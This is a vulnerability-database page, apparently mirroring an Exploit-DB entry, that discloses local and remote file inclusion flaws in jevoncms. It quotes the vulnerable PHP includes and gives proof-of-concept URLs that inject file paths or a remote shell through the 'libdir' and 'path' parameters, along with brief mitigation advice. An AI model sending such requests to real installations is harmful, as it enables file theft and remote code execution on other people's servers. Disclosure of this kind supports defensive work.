header-logo
Suggest Exploit
vendor:
jevoncms
by:
eidelweiss
8,8
CVSS
HIGH
Local File Inclusion (LFI) and Remote File Inclusion (RFI)
98, 94
CWE
Product Name: jevoncms
Affected Version From: -
Affected Version To: -
Patch Exists: NO
Related CWE: -
CPE: -
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: -
-

jevoncms (LFI/RFI) Multiple Vulnerabilities

jevoncms is vulnerable to both Local File Inclusion (LFI) and Remote File Inclusion (RFI) vulnerabilities. An attacker can exploit these vulnerabilities by sending a crafted HTTP request to the vulnerable application. The attacker can use the LFI vulnerability to read sensitive files from the server, while the RFI vulnerability can be used to execute malicious code on the server.

Mitigation:

To mitigate the LFI and RFI vulnerabilities, the application should validate user input and filter out any malicious characters. Additionally, the application should be configured to only allow access to the necessary files and directories.
Source

Exploit-DB raw data:

########################################################
	jevoncms (LFI/RFI) Multiple Vulnerabilities
########################################################

[+]Title	:	jevoncms (libdir) Multiple Vulnerability
[+]Version:	-
[+]Download:	http://sourceforge.net/projects/jevoncms/files/
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com	

	[!]Thank`s To: all friends

########################################################

	-=[ Vuln C0de ]=-
***************************
[-] jevoncms/php/main/jevoncms.php

$_PHPLIB["libdir"] = "phplib/"; 
require($_PHPLIB["libdir"] ."template.inc");      /* Disable this, if you are not using templates. */
require("template/jvc_template.php");
require("php/main/database/jvc_Database.php");

***************************
[-] jevoncms/php/main/template/jvc_template.php

if($type!=$lasttype && $type!=''){
  $path= "php/".$type."/".$type.".php" ;
 // echo $path;
  require($path);

***************************
[-] jevoncms/php/menu/menu.php

//require($_PHPLIB["libdir"] ."template.inc");      /* Disable this, if you are not using templates. */

***************************

	-=[ Proof Of Concept ]=-


	http://127.0.0.1/jevoncms/php/main/jevoncms.php?libdir=[lfi]

	http://127.0.0.1/jevoncms/php/main/template/jvc_template.php?path= [rfi shell]

	http://127.0.0.1/jevoncms/php/menu/menu.php?libdir=[lfi]

######################=[E0F]=#############################

Navigation

Suggest Exploit

Services By CQR